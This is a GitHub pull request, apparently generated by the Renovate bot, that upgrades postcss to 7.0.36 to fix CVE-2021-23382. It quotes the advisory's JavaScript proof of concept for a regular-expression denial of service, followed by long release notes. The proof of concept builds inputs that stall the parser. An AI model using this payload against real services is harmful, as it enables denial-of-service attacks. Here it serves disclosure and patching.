New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

chore(deps): update dependency postcss to v7 [security] #38

Open

renovate wants to merge 1 commit into master from renovate/npm-postcss-vulnerability

renovate bot commented May 28, 2023 •

edited

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
postcss (source)	`6.0.14` -> `7.0.36`

GitHub Vulnerability Alerts

CVE-2021-23382

The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern

\/\*\s* sourceMappingURL=(.*)

PoC

var postcss = require("postcss")
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}

postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i) try {
            postcss.parse(attack_str) var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}

Release Notes

postcss/postcss (postcss)

`v7.0.36`

Backport ReDoS vulnerabilities from PostCSS 8.

`v7.0.35`

Add migration guide link to PostCSS 8 error text.

`v7.0.34`

Fix compatibility with postcss-scss 2.

`v7.0.33`

Add error message for PostCSS 8 plugins.

`v7.0.32`

Fix error message (by @admosity).

`v7.0.31`

Use only the latest source map annotation (by Emmanouil Zoumpoulakis).

`v7.0.30`

Fix TypeScript definition (by Natalie Weizenbaum).

`v7.0.29`

Update Processor#version.

`v7.0.28`

Fix TypeScript definition (by Natalie Weizenbaum).

`v7.0.27`

Fix TypeScript definition (by Natalie Weizenbaum).

`v7.0.26`

Fix TypeScript definition (by Natalie Weizenbaum).

`v7.0.25`

Fix absolute path support for Windows (by Tom Raviv).

`v7.0.24`

Fix TypeScript definition (by Keith Cirkel).

`v7.0.23`

Update Processor#version.

`v7.0.22`

Add funding link for npm fund.

`v7.0.21`

Revert passing nodes property to node constructor.

`v7.0.20`

Allow to pass PostCSS’s nodes in nodes property to node constructor.

`v7.0.19`

Fix passing nodes property to node constructor.

`v7.0.18`

Fix TypeScript type definitions (by Jan Buschtöns).

`v7.0.17`

Fix TypeScript type definitions (by Bob Matcuk and Jan Buschtöns).

`v7.0.16`

Revert Custom Properties fix until PostCSS 8.0.

`v7.0.15`

Fix Custom Properties support (by Ivan Solovev).

`v7.0.14`

Fix tokenizer for postcss-less (by Matt Lyons).

`v7.0.13`

Fix parsing regression in 7.0.12 for comments between property and value.

`v7.0.12`

Fix parsing broken CSS with two words in declaration property.

`v7.0.11`

Fix source maps on declaration semicolon (by Niklas Mischkulnig).

`v7.0.10`

Fix source maps (by Niklas Mischkulnig).

`v7.0.9`

Increase stringifing performance for non-raws AST.

`v7.0.8`

Fix TypeScript definitions (by Ankur Oberoi).
Use support-colors 6.0.

`v7.0.7`

Extend Error in CssSyntaxError.

`v7.0.6`

Fix parsing files with BOM (by Veniamin Krol).

`v7.0.5`

Reduce npm package size (by Gilad Peleg).

`v7.0.4`

Fix safe parser regression.

`v7.0.3`

Update Processor#version.

`v7.0.2`

Update Processor#version.

`v7.0.1`

Fix passing nodes property to node constructor.

`v7.0.0`: 7.0 “President Amy”

President Amy seal

PostCSS 7.0 dropped Node.js 4 support and brought small features.

Breaking Changes

We removed Node.js 4 and Node.js 9 support since it doesn’t have security updates anymore.

We removed IE and “dead” browsers (without security updates) from Babel’s Browserslist. Don't worry, PostCSS still generate IE-compatible code. These changes affect websites which run PostCSS on client-side like CodePen.

last 2 version
not dead
not Explorer 11
not ExplorerMobile 11
node 10
node 8
node 6

New Features

@nikhilgaba added cute thing for plugin developers. If an error was happened in Container#walk() circle, PostCSS will show in stack trace CSS node, which causes this error:

TypeError: Cannot read property '0' of undefined
    at /home/ai/Dev/test/app.css:10:4
    at plugin (plugin.js:2:4)
    at runPostCSS (runner.js:2:1)

@igorkamyshev added finally method to LazyResult to make it compatible with the latest Promise API.

Other Changes

Client-side size was reduced by Size Limit feedback.
Add warning on calling PostCSS without plugins and syntax options.

`v6.0.23`

Fix parsing nested at-rules without semicolon, params, and spaces.
Fix docs (by Kevin Schiffer and Pat Cavit).

`v6.0.22`

Fix Node#prev and Node#next on missed parent.

`v6.0.21`

Rename Chinese docs to fix yarnpkg.com issue.

`v6.0.20`

Better error message on null as input CSS.

`v6.0.19`

Fix TypeScript definitions for source maps (by Oleh Kuchuk).
Fix source field in TypeScript definitions (by Sylvain Pollet-Villard).

`v6.0.18`

Use primitive object in TypeScript definitions (by Sylvain Pollet-Villard).

`v6.0.17`

Fix parsing comment in selector between word tokens (by Oleh Kuchuk).

`v6.0.16`

Fix warning text (by Michael Keller).

`v6.0.15`

Add warning about missed from option on process().then() call.
Add IE 10 support.

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate. View repository job log here.


          chore(deps): update dependency postcss to v7 [security]

a5f4f0b

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment